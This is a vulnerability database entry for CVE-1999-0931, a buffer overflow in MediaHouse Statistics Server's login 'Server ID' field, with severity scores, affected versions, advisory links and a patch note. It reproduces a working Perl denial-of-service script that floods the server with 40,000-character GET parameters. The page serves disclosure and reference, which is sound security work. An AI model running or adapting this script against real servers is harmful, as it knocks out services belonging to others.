CVE-1999-0931
CVSS 5.0
Published: 1999-09-30 00:00:00
Last revised: 2008-09-09 08:36:13
NMCOE    

[Original] Buffer overflow in Mediahouse Statistics Server allows remote attackers to execute commands.


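[CNNVD] MediaHouse Statistics Server "Server ID" buffer overflow vulnerability (CNNVD-199909-058)

        A buffer overflow vulnerability exists in MediaHouse Statistics Server. Remote attackers can exploit this vulnerability to execute commands.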

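- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on the confidentiality of the system]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: NONE [no impact on system availability]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]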

- CPE (affected platforms and products)

cpe:/a:mediahouse_software:statistics_server:4.28
cpe:/a:mediahouse_software:statistics_server:5.0

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0931
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0931
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199909-058
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/734
(UNKNOWN)  BID  734

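- Vulnerability information

MediaHouse Statistics Server "Server ID" buffer overflow vulnerability
Medium severity  Buffer overflow
1999-09-30 00:00:00 2005-05-02 00:00:00
Remote / Local
        A buffer overflow vulnerability exists in MediaHouse Statistics Server. Remote attackers can exploit this vulnerability to execute commands.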

- Advisories and patches

        MediaHouse has addressed this issue in Statistics Server 5.03:
        MediaHouse Software Statistics Server 4.28
        
        MediaHouse Software Statistics Server 5.1
        

- Vulnerability information (19562)

MediaHouse Software Statistics Server 4.28/5.1 "Server ID" Buffer Overflow Vulnerability (EDBID:19562)
windows dos
1999-09-30 Verified
0 Per Bergehed
N/A
source: http://www.securityfocus.com/bid/734/info

The web interface for Statistics Server contains an unchecked buffer which accepts input from the "Server ID" field of the login webpage. While the login webpage has a 16 character restriction, this is easily circumvented by editing the HTML to remove the restriction. Entering a string of more than 3773 characters will crash the server. This bug could potentially be used to remotely execute arbitrary code.

#!/usr/bin/perl

###############################################################
# Sample DoS against the Mediahouse Statistics Server
# This was tested against 4.28 & 5.01 running on Windows NT 4.0
#
# Only use it to determine if your own Server is vulnerable!
#
# Per Bergehed (per_bergehed@hotmail.com)
#
# http://w1.855.telia.com/~u85513179/security/exploits/mediahouse.html
#
# V1.0 - Check for "ss?form=statsredir&ID=..." buffer overflow.
# V1.1 - added check for "ss?form=setsite&ID=..." buffer overflow.
#

use IO::Socket;

print "############################################################\n";
print "# Simple DoS-attack against the Mediahouse Statistics Server\n";
print "# Tested with version 4.28 & 5.01\n";
print "\n";

if ($#ARGV != 0) 
{
        die "-> Please give the host address as argument.\n"
}

opensocket ("\n");
print $remote "GET " . "ss?setsite=" . "A" x 40000 . "& HTTP/1.0\n\n";
print $remote "GET " . "ss?form=statsredir&ID=" . "A" x 40000 . "& HTTP/1.0\n\n";
close $remote;

opensocket ("\n-> The server seemed to be vulnerable to this attack\n");
close $remote;
die "-> The server does not seem to be vulnerable to this attack\n";

sub opensocket 
{
        $remote = IO::Socket::INET->new (
                Proto => "tcp",
                PeerAddr => $ARGV[0],
                PeerPort => "http(80)",
        ) || die "# Can't open http-port on $ARGV[0]$_[0]";
        $remote->autoflush(1)
}

# EOF		

- Vulnerability information

1119
MediaHouse Statistics Server server ID Login Page Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

- Timeline

1999-09-30 Unknown
1999-09-30 Unknown

- Solution

Products

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete